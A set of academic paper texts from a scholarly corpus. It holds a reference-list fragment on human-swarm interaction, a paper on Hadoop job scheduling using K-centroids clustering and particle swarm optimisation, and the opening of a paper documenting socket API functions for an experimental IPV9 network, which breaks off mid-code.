Amraii SA, Lewis M, Chakraborty N, Sycara K. 2013. Human control of leader-based swarms. In: IEEE International Conference on Systems, Man, and Cybernetics (SMC). Piscataway: IEEE Press, 2712–2717. Walker P, Nunnally S, Lewis M, Kolling A, Chakraborty N, Sycara K. 2012. Neglect benevolence in human-swarm interaction with communication latency. In: Proceedings of the Third International Conference on Swarm, Evolutionary, and Memetic Computing. Berlin: Springer, 662–669. Wrobel J, Wu Y-H, Kerhervé H, Kamali L, Rigaud A-S, Jost C, Le Pévédic B, Duhaut D. 2013. Effect of agent embodiment on the elder user enjoyment of a game. In: Proceedings of the 6th International Conference on Advances in Computer-Human Interactions (ACHI). Red Hook: IARIA XPS Press, 162–167. Podevijn et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.82 19/19 http://dx.doi.org/10.1007/s11721-016-0124-3 http://www.R-project.org/ http://dx.doi.org/10.5898/JHRI.4.1.Setter http://dx.doi.org/10.1145/1077246.1077253 http://dx.doi.org/10.7717/peerj-cs.82 https://peerj.com/ Investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction Introduction Related Literature Methodology Data analysis and results Discussion and Conclusion References work_pe6afkaafrgthcfkm3jxai36zy ---- 034 A Disparateness-Aware Scheduling using K-Centroids Clustering and PSO Techniques in Hadoop Cluster E. Laxmi Lydia1,Dr. M.Ben Swarup2 1Associate Professor, Department of Computer Science and Engineering, Vignan’s Institute Of Information Technology, Visakhapatnam, Andhra Pradesh, India. 2Professor, Computer Science and Engineering, Vignan’s Institute Of Information Technology, Visakhapatnam, Andhra Pradesh, India. Email:elaxmi2002@yahoo.com Abstract. Big data storage management is one of the most challenging issues for Hadoop cluster environments, since large amount of data intensive applications frequently involve a high degree of data access locality. In traditional approaches high-performance computing consists dedicated servers that are used to data storage and data replication. Therefore to solve the problems of Disparateness among the jobs and resources a “Disparateness-Aware Scheduling algorithm” is proposed in the cluster environment. In this research work we represent K-centroids clustering in big data mechanism for Hadoop cluster. This approach is mainly focused on the energy consumption in The Hadoop cluster, which helps to increase the system reliability. The Hadoop cluster consists of resources which are categorized for minimizing the scheduling delay in the Hadoop cluster using the K-Centroids clustering algorithm. A novel provisioning mechanism is introduced along with the consideration of load, energy, and network time. By integrating these three parameters, the optimized fitness function is employed for Particle Swarm Optimization (PSO) to select the computing node. Failure may occur after completion of the successful execution in the network. To improve the fault tolerance service, the migration of the cluster is focused on the particular failure node. This can recomputed the node by PSO and the corresponding optimal node is predicted. The experimental results exhibit better scheduling length, scheduling delay, speed up, failure ratio, energy consumption than the existing systems. Keywords: K-Centroids Clustering, Big data, Hadoop Cluster, data access locality, data replication, systemreliability, particle swarm optimization International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 035 1. Introduction In recent years, big data has rapidly developed into a hotspot that attracts great attention from academia, industry, and even governments around the world [1–2]. Nature and Science have published special issues dedicated to discuss the opportunities and challenges brought by big data [3, 4]. McKinsey, the well-known management and consulting firm, alleged that big data has penetrated into every area of today’s industry and business functions and has become an important factor in production [5]. Using and mining big data heralds a new wave of productivity growth and consumer impetus. O’Reilly Media even asserted that “the future belongs to the companies and people that turn data into products”[6]. Some even say that big data can be regarded the new petroleum that will power the future information economy. In short, the era of big data has already been in the offing. What is big data? So far, there is no universally accepted definition. In Wikipedia, big data is defined as “an all-encompassing term for any collection of data sets so large and complex that it becomes difficult to process using traditional data processing applications”[7]. From a macro perspective, big data can be regarded as a bond that subtly connects and integrates the physical world, the human society, and cyberspace. Here the physical world has a reflection in cyberspace, embodied as big data, through Internet, the Internet of Things, and other information technologies, while human society generates its big data- based mapping in cyberspace by means of mechanisms like human–computer interfaces, brain–machine interfaces, and mobile Internet [8]. In this sense, big data can basically be classified into two categories, namely, data from the physical world, which is usually obtained through sensors, scientific experiments and observations (such as biological data, neural data, astronomical data, and remote sensing data), and data from the human society, which is often acquired from such sources or domains as social networks, Internet, health, finance, economics, and transportation. Apache Hadoop is a software framework that supports data-intensive distributed applications under a free license. It has been used by many big technology companies, such as Amazon, Facebook, Yahoo and IBM. Hadoop [1] is best known for MapReduce and its distributed file system (HDFS). MapReduce idea is mentioned in a Google paper [11], to be simply the task of MapReduce is another processing of divide and concur. Hadoop [8] is aimed at problems that require examination of all the available data. For example, text analysis and image processing generally require that every single record be read, and often interpreted in the context of similar records. Hadoop uses a technique called MapReduce to carry out this exhaustive analysis quickly. HDFS gives the distributed computing storage provides and support. They are the two main subprojects for Hadoop platform. .Hadoop set FIFO algorithm as its default algorithm. According to our research of algorithm for Hadoop, we found that it unable to satisfy the demand of users. We cannot only keep the idea of first come first served. We need to think about the requirement form that has the higher priority, but at the same time we also can keep the fairness to other users. Then we announced K-centroids Clustering algorithm in Big Data-Hadoop Cluster. 1.1 Hadoop And Hdfs Overview Hadoop Distributed File System (HDFS)[4] is the primary storage system used by Hadoop applications. The Hadoop distributed file system is designed to handle large files (multi-GB) with sequential read/ write operation. Each file is broken into chunks, and stored across multiple data nodes as local OS track of overall file directory structure and the placement of chunks. DataNode reports all its chunks to the NameNode at bootup. Each chunk has a version number which will be increased for all update. Therefore, the NameNode know if any of the chunks of a DataNode is stale those stale chunks will be garbage collected at a later time. To read a file, the client API will calculate the chunk index based on the offset of the file pointer and make a request to the NameNode. The NameNode will reply which DataNodes has a A Disparateness-Aware Scheduling using K-Centroids Clustering and PSO Techniques in Hadoop Cluster International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 036 copy of that chunk. From this points, the client contacts the DataNode directly without going through the NameNode. To write a file, client API will first contact the NameNode who will designate one of the replica as the primary (by granting it a lease). The response of the NameNode contains who is the primary and who are the secondary replicas. Then the client push its changes to all DataNodes in any order, but this change is stored in a buffer of each DataNode. After changes are buffered at all DataNodes, the client send a ― commit‖ request to the primary, which determines an order to update and then push this order to all other secondaries. After all secondaries complete the commit, the primary will response to the client about the success. All changes of chunk distribution and metadata changes will be written to an operation log file at the NameNode. This log file maintain an order list of operation which is important for the NameNode to recover its view after a crash. The NameNode also maintain its persistent state by regularly check- pointing to a file. In case of the NameNode crash, a new NameNode will take over after restoring the state from the last checkpoint file and replay the operation log. Fig.1 1.2 Mapreduce Overview The MapReduce frame work [3] consists of a single master JobTracker and one slave TaskTracker per cluster node. The master is responsible for scheduling the jobs’ component tasks in the slaves, monitoring them, and re-executing any failed tasks. The slaves executed the tasks as directed by the master. As mentioned, MapReduce applications are based on a master-slave model [6]. This part describes the various operations that are performed by a generic application to transform input data into output data according to that model. The user defined map and reduce functions [5], the map function processes a key/value pairs and return a list of intermediate key/value pairs Map(k1,v1)—-list(k2 v2) The reduce function merges all intermediate values having the same intermediate key: Reduce (k2, list(v2))---list(v2) The JobTracker will first determine the number of splits (each split is configurable, ~16-64MB) from the input path, and select some TaskTracker based on their network proximity to the data sources, then the 037 Job Tracker send the task requests to those selected Task Trackers. Each TaskTracker will start the map phase processing by extracting the input data from the splits. For each record parsed by the “Input Format”, it invokes the user provided “map” function, which emits a number of key/value pair in the memory buffer. A periodic wakeup process will sort the memory buffer into different reducer node by invoke the “combine” function. The key/value pairs are sorted into one of the R local files (suppose there are R reducer nodes). When the map task completes (all splits are done), the TaskTracker will notify the JobTracker. When all the TaskTrackers are done, the JobTracker will notify the selected TaskTrackers for the reduce phase. Each TaskTracker will read the region files remotely. It sorts the key/value pairs and for each key, it invokes the “reduce” function, which collects the key/aggregated Value into the output file (one per reducer node). Fig.2 2. Related Work Hadoop’s MapReduce operation is initiative requesting from taskTracker to jobtracker .The principle is similar to ordinary, non-preemptive scheduling operating system, which is cannot be interrupt once the task is assigned. As what I have learned about the Hadoop algorithms, there are four classic algorithms. 2.1 First In First Out (FIFO): This expression describes the principle of a queue processing technique or servicing conflicting demands by ordering process by first come, first served behavior, what comes in first is handled first, what comes in next waits until the first is finished. This is the default algorithm in Hadoop. A Disparateness-Aware Scheduling using K-Centroids Clustering and PSO Techniques in Hadoop Cluster International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 038 2.2 Round Robin (RR): In computer operation, one method of having different program process take turns using the resources of the computer is to limit each process to a certain short time period, then suspending that process to give another process a turn (or “time-slice”). This is often described as round-robin process scheduling. 2.3 Height Priority First (HPF): The algorithm scheduling process, each will be assigned to handle the highest priority ready process. Priority setting for the number of static when it can be dynamic. Static priority number is in the process of creation is based on the initial characteristics of the process or user requirements identified in the process cannot be changed during operation. Dynamic priority number refers to the process and then create an initial priority to determine when the first number, after running in the process as the process characteristics change. 2.4 Weighted Round Robin (WRR): Weighted Round Robin is a scheduling discipline. Each packet flow or connection has its own packet queue in a network interface card. It is the simplest approximation of generalized. While GPS serves infinitesimal amounts of data from each nonempty queue, WRR serves a number of packets for each nonempty queue. 3. Disparateness Aware Scheduling Approach In Hadoop Cluster Environment This section explains the overall flow description of the proposed Disparateness-aware scheduling approach in cluster environment. Initially, the Disparateness cluster environment is created along with the properties of resource such as resource type, processing speed, and the memory. In order to avoid the scheduling delay, the system needs to form a cluster using the K-centroids clustering. Depending up on higher priorities, the node will move to the cluster. Furthermore, the cosine similarity is finding out to compute the clusters. After accomplishing the cluster, the fitness function is estimated with the consideration of load, energy, and time for each cluster. Thus, the clusters are scheduled and then executed after uploading the load. Once any failure occurs during the process, the value must recomputed using PSO and predicted another optimal node. Figure 3 depicts the overall flow diagram of the proposed methodology. The major components of the proposed system are briefly discussed as follows: Table. 1 Symbols and its descriptions 039 3.1 K-Centroids Clustering The well-known clustering problem can be solved by K-means, which is one of the simplest unsupervised learning algorithms. Assume the K number of clusters for classifying a given cluster processor in a simple and easy way. K-means clustering does not have a guarantee for optimal solution as the performance is based on an initial centroids. Thus, the proposed system uses the partitioning clustering, say, K-centroids clustering as described in the following algorithm. Table I shows the notation and its description that employed in the proposed system Fig. 3 An overall flow diagram of the proposed K-centroids clustering In Hadoop Cluster. Algorithm 1: K-Centroids Clustering Input: Cluster Processors CPn, k value Begin: Initialize k centroids Ck For i = 0, 1, 2…n then // Cluster Resource Property A Disparateness-Aware Scheduling using K-Centroids Clustering and PSO Techniques in Hadoop Cluster International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 040 While (Curr_Index < k) then IfSim [i] [Curr_Index] < Min then Min = Sim [i] [Curr_Index] Min_Index = Curr_Index; End If Curr_Index++; End While SetClusterID (Min_Index); End for i; End Begin; The inputs taken for the above K-centroids clustering algorithm are the Cluster processors and the K value. At first, the K number of centroids are initialized and the vectors V1and V2 are defined with respect to the retrieving time, Cluster processing speed, and size of Cluster resource. Depending up on the vectors, the cosine similarity is estimated. Then, the similarity measures verifies for the minimum value of the current index. If the value is said to be less, then it sets as a minimum value. It checks until the current index is less than the k number of centroids. The minimum index is set as the cluster ID. Further, the fitness function is estimated until all jobs are scheduled by the consideration of load, energy, and time for each cluster. It is defined as: f(n) = T(i,r) + L(i,r) + E(i,r) (1) 3.1.1 Time Computation The time computation for ith cluster completion in rth Cluster resource is described as: T(i,r) = ITr + ET(i,r) + RT(i,r) (2) Where, the Executing Time of ith cluster in rth Cluster resource and Retrieving Time of ith cluster in rth Cluster resource are given respectively as in equation (3) and equation (4). (3) (4) Herein, BWsr is the bandwidth for the scheduler to the receiver and δsr mentions the delay that occurs between the scheduler and the receiver for network communication. 3.1.2 Load Computation The load computation of rthCluster resource at ithcluster submission is as follows: 041 (5) 3.1.3 Energy Computation An energy required for ith cluster in rth cluster resource is defined as: E(i,r)=IEr + EE(i,r) (6) Where, the Execution Energy of ith cluster in rth Cluster resource is given as: EFir = CS * CPEr (7) Based on the consideration of time, load, and energy, the proposed estimation of fitness function has the following advantages:  The scheduling delay can be avoided in the initial stage.  Minimize the computation cost  Decrease the execution time 3.2 Pso Based Disparateness-Aware Scheduling Model The heuristic optimization algorithms are widely used for solving a wide variety of NP-complete problems. PSO is considered as the latest evolutionary optimization techniques, which has fewer algorithm parameters than the other approaches. Algorithm 2: Disparateness-Aware Scheduling using PSO Input : Cluster List Jn , Cluster Resource CRm Output : Allocated Cluster List ALn Begin For x = 0, 1, 2 … n then TGR = ; // Temporary Cluster Resource list For y= 0, 1, 2 … m then If (Jx . Rtype(). Equals( CRy . Rtype() ) then TCR.add (CRy) End IF; End Fory; SCR = PSO (TCR, Jx ) // Selected Cluster resource Jx . setclusterResource SCR ALx ← SGR End For x; End Begin; The inputs taken for this model are cluster list and the cluster resource. Initially, the temporary cluster resource list is empty and the similarity should be further verified. It checks whether the resource type of cluster list is similar to the resource type of cluster resource. If the verification is similar, then the cluster resources are added to the temporary cluster resource list. The technique of PSO is applied for the temporary cluster resource list and the cluster list to accomplish the selected cluster resource. The final output obtained in this scheduling model is the allocated cluster resource along with the selected cluster resource. When a failure occurs during this process, it can be recomputed by PSO and the other optimal node will be predicted. The advantages over the heterogeneous-aware scheduling model are: A Disparateness-Aware Scheduling using K-Centroids Clustering and PSO Techniques in Hadoop Cluster International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 042  Minimize the number of failures  Increases the resource utilization 4. Performance Analysis This section compares the performance of the proposed Disparateness-Aware Scheduling (DAS) algorithm with two existing scheduling algorithms: Height Priority First (HPF)[12] and Weighted Round Robin (WRR)[12].The performance metrics used for the analysis are: system reliability, scheduling delay, scheduling length, speed up, energy consumption, and failure ratio with respect to the number of clusters. Due to the dynamic resource availability, the behavior of scheduling algorithms on real cluster platforms is not practical. The simulation is the optimum choice for testing and comparing the scheduling algorithms, where the experiments on real platforms are often non-reproducible. Thus, an extensive simulation environment of cluster system is built as in Table 2. Table. 2 Simulation parameters 4.1 System Reliability Vs. Number Of Clusters The reliability of the system can be calculated by the average reliability of all clusters and is mathematically defined as follows: (8) Here, R[EAK] is the distribution of the reliability probability of clusters AK , and n is the number of clusters. Fig.2 describes the system reliability in terms of the number of clusters for the existing HPF and WRR and the proposed DAS model. The system reliability of DAS model is greater than the other two existing approaches, where its value is gradually decreased with respect to the number of clusters. 043 Fig. 4 The result of system reliability with respect to the number of clusters 4.2 Scheduling Length Vs. Number Of Clusters Schedule length is measured as: SL=max{SL(A1), SL(A2),…, SL(An) (9) Fig. 5 The result of schedule length with respect to the number of Clusters. Fig. 5 depicts the result of the schedule length in terms of number of clusters for the existing HPF and WRR and the proposed DAS model. The schedule length is lower than the other two existing systems. 4.3 Speed Up Vs. Number Of Clusters The speed up is the ratio of the sequential execution time to the schedule length of the output schedule. It is computed as follows: (10) A Disparateness-Aware Scheduling using K-Centroids Clustering and PSO Techniques in Hadoop Cluster 044 International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 Fig.6 shows the result of speed up with respect to the number of clusters for the existing HPF and WRR and the proposed DAS model. The speed up of HAS model is higher than the other two existing approaches, where its value is gradually increasing with regard to the number of clusters. Fig. 6 The result of speed up with respect to the number of clusters. 4.4 Scheduling Delay Vs. Number Of Cluster Resource Fig. 7 The result of scheduling delay with respect to the number of cluster resources. Fig.7 shows the result of scheduling delay with respect to the number cluster resource for the existing HRDS2 and MCMS and the proposed HAS model. The proposed system has a lower scheduling delay than the other two scheduling algorithms. 4.5 Energy Consumption Vs. Number Of Cluster Resource Fig.8 shows the result of energy consumption with respect to the number cluster resource for the existing HPF and WRR and the proposed DAS model. The proposed system consumes less energy than the other two scheduling algorithms. Its value gradually increases in regards to the number of cluster resource. 045 Fig. 8 The result of energy consumption with respect to the number of cluster resource. 4.6 Failure Ratio Vs. Number Of Cluster Resource The result of the scheduling delay with respect to the number cluster resource for the existing HPF and WRR and the proposed DAS model is shown in Fig.8. The proposed system has a lower failure ratio than the other two existing scheduling algorithms. Fig. 9 The result of failure ratio with respect to the number of Cluster resource. 5. Conclusion And Future Work This paper proposes a ―Disparateness-Aware Scheduling algorithm in the cluster environment. In this research work we represent K-centroids clustering in big data mechanism for Hadoop cluster. This approach is mainly focused on the energy consumption in the Hadoop cluster, which helps to increase the system reliability. The Hadoop cluster consists of resources which are categorized for minimizing the scheduling delay in the Hadoop cluster using the K-Centroids clustering algorithm. A novel provisioning mechanism is introduced along with the consideration of load, energy, and network time. By integrating these three parameters, the optimized fitness function is employed for Particle Swarm Optimization (PSO) to select the computing node. Failure may A Disparateness-Aware Scheduling using K-Centroids Clustering and PSO Techniques in Hadoop Cluster 046 occur after completion of the successful execution in the network. To improve the fault tolerance service, the migration of the cluster is focused on the particular failure node. This can recomputed the node by PSO and the corresponding optimal node is predicted. The experimental results exhibit better scheduling length, scheduling delay, speed up, failure ratio, energy consumption than the existing systems. References [1]V. Mayer-Schonberger, K. Cukier, Big Data: A Revolution That Will Transform How We Live, Work, and Think, Houghton Mifflin Harcourt, 2013. [2]A. Cuzzocrea, Privacy and security of big data: current challenges and future research perspectives, in: Proceedings of the First International Workshop on Privacy and Securityof Big Data, PSBD ’14, 2014. [3]Big data, Nature 455(7209) (2008) 1–136. [4]Dealing with data, Science 331(6018) (2011) 639–806. [5]C. O’Neil, R. Schutt, Doing Data Science: Straight Talk from the Frontline, O’Reilly Media, Inc., 2013. [6]Big data, http://en.wikipedia.org/wiki/Big_data, 2014. [7]G. Li, X. Cheng, Research status and scientific thinking of big data, Bull. Chin. Acad. Sci. 27(6) (2012) 647– 657. [8]Y. Wang, X. Jin Xueqi, Network big data: present and future, Chinese J. Comput. 36(6) (2013) 1125–1138. [9]X.-Q. Cheng, X. Jin, Y. Wang, J. Guo, T. Zhang, G. Li, Survey on big data system and analytic technology, J. Softw. 25(9) (2014) 1889–1908. [10] J.Dean,S．Ghemawa．MapReduce：Simplified Data Processing on Large Cluster．OSDI’04，Sixth Symposium on Operating System Design and Implementation, SanFrancisco ， CA ，December,2004 [11]http://www.vmware.com/appliances/directory/up loaded_files/What%20is%20Hadoop.pdf. [12] Haiyang Li ―PWBRR Algorithm of Hadoop Platform. International Journal of Advanced Network Monitoring and Controls Year 2016, No. 02 work_pee4lh5o6ncbrmy2pmtlywkela ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 DOI: 10.21307/ijanmc-2019-071 56 Design and Research of Future Network (IPV9) API Xu Yinqiu Shanghai Decimal Network Information Technology Co. Ltd. E-mail: 8918616209@126.com Xie Jianping Shanghai Decimal Network Information Technology Co. Ltd. E-mail: 13386036170@189.cn Abstract—Socket is a way of process communication, that is used it to invoke some API function to realize the distribution network libraries in different host of data exchange between the relevant process. According to the TCP/IP protocol assigned to the network address of the local host, to communicate between the two processes, the host must know the other's location first, that is, the IP of the other host. At the same time, to get the port number, it is used to identify the local communication process; a local process in communication will occupy a port number, different process port number is different, so it must be assigned a port number that is not used before communication. A complete inter-network process consists of two processes and should use the same high-level protocol. IPV9 is the most important part of future network. This paper introduces the interface function and socket of IPV9, which lays a foundation for further network application programming. Keywords -IPV9; Interface; Socket; API I. INTERFACE AND SOCKET The transport layer implements end-to-end communication, so there are two terminals for each transport layer connection. What is the terminal of the transport layer connection? It is neither the host, nor the host's IP address, and not the application process, not the transport layer protocol port. The terminal to which the transport layer connects is called a socket. According to the definition of RFC793, the port number is spliced to the IP address to form a socket. A socket is actually a communication endpoint, an interface between an application and a network protocol. Each socket has a socket number, including the IP address of the host and a 16-bit host port number, such as (host IP address: port number). In short, Socket is equals to (IP address: port number), which is represented by a decimal IP address followed by a port number, separated by a colon or comma. Each transport layer connection is uniquely identified by two terminals (that is, two sockets) at each end of the communication. For example, if the IPv4 address is 118.38.18.1 and the port number is 23, the resulting socket is (118.38.18.1:23), If the IPV9 address is 86[128[5]118.38.18.1 and the port number is 23, the resulting socket is (86[128[5] 18.38.18.1:23). A socket can be thought of as a terminal in the communication connection between two network applications. During communication, a piece of information to be transmitted by one of the network applications is written into the Socket of its host, which sends the piece of information to the Socket of another host through the transmission medium of the network interface, so that the piece of information can be transmitted to other programs. Therefore, the data transfer between the two applications is done through the socket. During network application design, IPv4 can be realized through the programming interface of TCP/IP provided by the system, since the core content of TCP/IP is encapsulated in the operating system. All clients and servers of TCP-based socket programming begin with calling a socket, which International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 57 returns a socket descriptor. The client then calls the connect function, while the server calls the bind (), listen (), and accept () functions. The socket is usually closed by using the standard close function, but it can be also used the shutdown function to close the socket. The Socket interaction flow is shown in figure 1. Figure 1. The Socket interaction flow II. IPV9 SOCKET In the Linux environment of IPv9, the core contents of TCP 9/IP9 are encapsulated in the operating system kernel. In order to support user development of application-oriented communication programs, most systems provide a set of application programming interfaces (API) based on TCP 9 or UDP 9, which are usually presented in the form of a set of functions, also known as sockets. These sockets are described below. This document is the IPv9 protocol experimental application development instructions, non-industry standard documents. A. Socket A socket is an abstraction layer through which applications can send or receive data and open, read, and close it as if it were a file.Sockets allow applications to plug I/O into the network and communicate with other applications in the network. This version of network sockets supports a combination of IPv4, IPv6, and IPv9 addresses and ports. 1) Head file #include<sys/types.h> #include<sys/socket.h> 2) Prototype int socket(int domain, int type, int protocol); 3) Description Socket: Creates and returns a communication sleeve interface handle. The parameter domain describes the communication domain, that is, the select communication protocol family. These communication protocol families are defined in the header file International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 58 <sys/socket.h>. Currently supported protocol families are as follows:  PF_UNIX,PF_LOCAL(Local communication protocol)  PF_INETIPv4 (Protocol)  PF_INET6(IPv6 Protocol)  PF_INET9(IPv9 Protocol)  PF_IPXNovell (Protocol)  PF_NETLINK(Core user interface device)  PF_X25ITU-T X.25 (Protocol)  PF_AX25AX.25 (Protocol)  PF_ATMPVC(Access to the original ATM PVCs)  PF_APPLETALKAppletalk  PF_PACKET(Low-level envelope interface ) The parameter type is used to describe the communication semantics. Currently defined types are as follows:  SOCK_STREAM It provides sequential, reliable, duplex, connection-based byte streams that can also support out-of-band data transfer.  SOCK_DGRAM It supports datagram (connectionless, unreliable messages of fixed maximum length).  SOCK_SEQPACKET It provides a sequential, reliable, duplex, connection-based data path for datagram of fixed maximum length.  SOCK_RAW It provides original network protocol access.  SOCK_RDM It provides a reliable datagram layer that does not guarantee order. Some sets of interface types are not implemented on all protocol families, such as the SOCK SEQPACKET is not implemented in the AF_INET protocol family The parameter protocol describes a special protocol for the socket interface. There is usually only one simple protocol that can support a particular set of interface types that contain a given family of protocols. Of course, sometimes when multiple protocols exist that must be specified with this parameter. 4) Returned value -1 is returned value when an error occurs, and errno represents the error type value. Otherwise, the socket interface handle value is returned。 B. Bind () Bind () is a local address to a set of interfaces function. This function is suitable for unconnected datagram or stream class interfaces and is used before connect () or listen () calls. When a socket () is created, it exists in a namespace (address family) but is not named. The bind () function establishes a local binding (host address/port number) for the socket interface by assigning a local name to an unnamed socket interface. 1) Head file #include<sys/types.h> #include<sys/socket.h> 2) Prototype Bind(intsockfd, structsockaddr *my_addr, socklen_taddrlen); 3) Description Bind() provides the local address my_addr for the socket interface handle, the length of my_addr is the parameter addrlen, which is called set interface name assignment. In general, a socket interface of type SOCK_STREAM must call bind() to assign a local address in order to connect and receive. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 59 The structure of the assignment is also different for different protocol families. Such as for AF_INET is sockaddr_in and AF_INET9 is sockaddr_in9. 4) Returned value Return 0 on success. The error returns -1, and errno represents the error type value. C. Connect () Connect () is used to establish a connection to the specified socket。 1) Head file #include <sys/types.h> #include<sys/socket.h> 2) Prototype Connect (intsockfd, conststructsockaddr *serv_addr, socklen_taddrlen); 3) Description The handle sockfd must point to a socket interface. If the type of the socket interface is SOCK_DGRAM, the address represented by the parameter serv_addr is the default destination address of the datagram and the source address when the datagram is received. If the socket interface is of type SOCK_STREAM or SOCK_SEQPACKET, the call attempts to establish a connection to another socket interface. The other interface is described by the serv_addr parameter, which is the address of interface communication spaces, each of which interprets the serv_addr parameter. Typically, connection-based protocols only successfully connect once; connectionless interfaces may connect multiple times to change sessions. A connectionless interface may also connect to an address whose family of protocols is AF_UNSPEC to cancel the session. 4) Returned value Return 0 on success. The error returns -1, and errno represents the error type value. D. Listen () It is used to create a socket interface and listen for the requested connection. 1) Head file #include <sys/types.h> #include<sys/socket.h> 2) Prototype int listen(int s, int backlog); 3) Description To confirm the connection, the socket is called to create a socket interface, and the listen () describes the willing to confirm the connection and the length limit of the connection queue before calling accept to confirm the connection. The listen () call only works on the socket interfaces of types SOCK_STREAM and SOCK_SEQPACKET. The parameter backlog defines the maximum length of the unconnected queue. 4) Returned value Return 0 on success. The error returns -1, and errno represents the error type value. E. Accept () It is used to create a socket interface and monitoring for the requested connection. 1) Head file #include <sys/types.h> #include<sys/socket.h> 2) Prototype int accept(int s, structsockaddr *addr, socklen_t *addrlen); 3) Description The accept function can be used based on the socket interface type of the connection (SOCK_STREAM, SOCK_SEQPACKET, and SOCK_RDM). It selects the first connection request in International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 60 the unconnected queue, creates a new connected socket interface similar to the parameter s, and then assigns a handle to that socket interface and returns. The newly created socket interface is no longer in the listening state, and the source socket interface s is not affected by the call. 4) Returned value The error returns -1, and errno represents the error type value. Successfully returns a non-negative integer, representing the handle to the socket interface. F. Select () It is used for monitoring three socket interfaces. 1) Head file #include <sys/time.h> #include <sys/types.h> #include <unistd.h> 2) Prototype int select(int n, fd_set *readfds, fd_set *writefds, fd_set *exceptfds, structtimeval*timeout); FD_CLR(intfd, fd_set *set); FD_ISSET(intfd, fd_set *set); FD_SET(intfd, fd_set *set); FD_ZERO(fd_set *set); 3) Description Select () allows to monitoringthe three socket interface at the same time: readfds, writefds and exceptfds. The socket interface in the Readfds will be listened for acceptable characters; the socket interface in writefds will be monitored to see if data can be sent immediately. The socket interface in exceptfds will be monitored for exceptions. Four macros are defined to manipulate the set of socket interfaces: FD_ZERO will empty a set; FD_SET and FD_CLR add or remove a handle from the set. FD_ISSET is used to test whether a handle is in the set. The parameter n should be equal to the value of the highest file descriptor plus 1. The timeout parameter defines the maximum interval for the select call to block until it returns. It can be zero, so that select returns directly. If the timeout structure pointer is NULL, select will block the indeterminate time. 4) Returned value On success, return the socket interface handle contained in the socket interface set, returns 0 if no change occurs after the maximum interval. -1 is returned on error, and errno represents the error type value G. Recv (), Recvfrom(), Recvmsg() 1) Head file #include <sys/types.h> #include<sys/socket.h> 2) Prototype intrecv(int s, void *buf, size_tlen, int flags); Intrecvfrom(int s, void *buf, size_tlen, int flags, structsockaddr *from, socklen_t *fromlen); Intrecvmsg(int s, structmsghdr *msg, int flags); 3) Description The Recvfrom() and recvmsg() calls are used to receive information from a socket interface, regardless of whether the socket interface is connection-oriented. If the from () parameter is not NULL, then the socket interfaces is not connection-oriented and the source address of the message is assigned to it. The fromlen parameter starts with the data buffer size of the parameter from and returns the buffer size of the actual storage address in the parameter from. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 61 A Recv () call is usually used in a connected socket interface, this is equivalent to the case where the parameter from is NULL when recvfrom is called. If the data message is successfully received, the return value is the length of the data message. If the length of the data message exceeds the length of the data buffer, the excess is discarded, depending on the type of socket interface used to receive the message. If the socket interface does not receive the information, it will always wait for the information unless the socket interface is non-blocking. When the socket interface is non-blocking, the return value is -1 and the errno value is EAGAIN. The Recvmsg call the MSGHDR structure, defined in the header file <sys/socket.h>. 4) Returned value The length of the received data is returned on success, -1 is returned on error, and errno represents the value of the error type. H. Send(), Sendto(), Sendmsg() 1) Head file #include <sys/types.h> #include<sys/socket.h> 2) (2) Prototype Intsend(int s, const void *msg, size_tlen, int flags); Intsendto(int s, const void *msg, size_tlen, int flags, conststructsockaddr *to, socklen_ttolen); Intsendmsg(int s, conststructmsghdr *msg, int flags); 3) Description The Send (), sendto, and sendmsg calls are used to transfer information to other interfaces. The Send () call applies only to the connection-oriented socket interface, while the sendto and sendmsg calls apply to all situations. The destination address is set by the parameter to, its length is the parameter tolen, and the length of the message is represented by the parameter len. If the length of the message is too large to be sent all at once by the low-level protocol, -1 is returned, and errno is set to EMSGSIZE. If the length of the send message is greater than the length of the socket interface send buffer, the send call will normally block unless the socket interface is set to a non-blocking mode. In non-blocking mode -1 is returned and errno is set to EAGAIN. The Select call can determine whether more data can be sent. The structure MSGHDR is defined in the header file <sys/socket.h>. 4) Returned value The length of the sent data is returned on success, -1 is returned on error, and errno represents the value of the error type. I. Ioctl() 1) Head file #include <sys/ioctl.h> 2) Prototype intioctl(int d, intrequest, ...); 3) Description Ioctl( ) calls operate on the parameters of the underlying device. Parameter d is the file handle, and the parameter request determines the type and size of the back parameters. See the <sys/ioctl.h> for the macro definition used to describe the parameter request. 4) Returned value 0 is returned on success, -1 is returned on error, and errno represents the error type value. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 62 J. Getsockopt()，setsockopt() 1) Head file #include <sys/types.h> #include<sys/socket.h> 2) Prototype Intgetsockopt(int s, intlevel, intoptname, void *optval, socklen_t *optlen); Intsetsockopt(int s, int level, intoptname, const void *optval, socklen_toptlen); 3) Description The Getsockopt() and setsockopt() calls can operate on the options of the socket interface. Options exist at multiple protocol levels, but are always represented at the highest socket interface level. When socket interface options are setting, it must be specify the level name and option name. For the socket interface level option, the level is called SOL_SOCKET. For other levels of protocol, other protocol control Numbers are provided, such as the TCP protocol, and the level name must be the TCP series. The parameters optval and optlen are used when setsockopt calls access option values. For the getsockopt calls, they are buffers that return the request option value; the optlen parameter starts with the size of the buffer optval, and returns with the buffer size of the actual return value. If no option value can be returned, the parameter optval is set to NULL. The optname and option parameters are sent to the appropriate core protocol module for interpretation without explanation. In the header file <sys/socket.h>, there is a detailed definition of the socket interface level and option structure, and the option formats and names for different protocol levels vary greatly. Most interface-level options take an integer value as the parameter optval, and for setsockopt calls, the parameter must be non-zero to support Boolean options, or zero to disable. In the design of IPv9 stream label, the following call can be used: int on = 1； struct in9_flowlabel_req freq； structin9_addrdst_addr； memcpy(&(freq.flr_dst)，&dst_addr，32)； freq.flr_label = htonl(0x0000000f)； freq.flr_action = IPV9_FL_A_GET； freq.flr_share = 